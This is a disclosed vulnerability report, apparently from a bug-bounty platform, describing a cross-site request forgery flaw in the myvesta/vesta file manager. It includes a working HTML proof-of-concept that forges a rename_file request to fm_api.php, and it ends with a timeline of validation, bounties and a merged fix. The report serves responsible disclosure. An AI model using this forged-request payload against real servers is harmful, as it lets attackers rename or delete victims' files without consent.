Cross-Site Request Forgery (CSRF) in myvesta/vesta

Valid

Reported on

Aug 24th 2021


✍️ Description

Attacker is able to rename any file on the server if logged in user visits attacker website.

🕵️‍♂️ Proof of Concept

Create a test.txt file under /home/user when you logged in open this POC.html in a browser you can check test.txt renames to test.php.


//PoC.html
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://demo.myvesta.com/file_manager/fm_api.php">
<input type="hidden" name="item" value="test&#46;php" />
<input type="hidden" name="target&#95;name" value="test&#46;txt" />
<input type="hidden" name="dir" value="&#47;home&#47;user&#47;" />
<input type="hidden" name="action" value="rename&#95;file" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>

💥 Impact

This vulnerability is capable of forging admin or user to delete any file where user has access to it.

💥 Test

Tested on Edge, firefox, chrome and safari. 📍 Location fm_api.php#L1 📝 References csrf

Occurences

References

We have contacted a member of the myvesta/vesta team and are waiting to hear back a month ago
Musio modified their report
25 days ago
myvesta validated this vulnerability 19 days ago
Musio has been awarded the disclosure bounty
The fix bounty is now up for grabs
myvesta confirmed that a fix has been merged on 93de22 19 days ago
myvesta has been awarded the fix bounty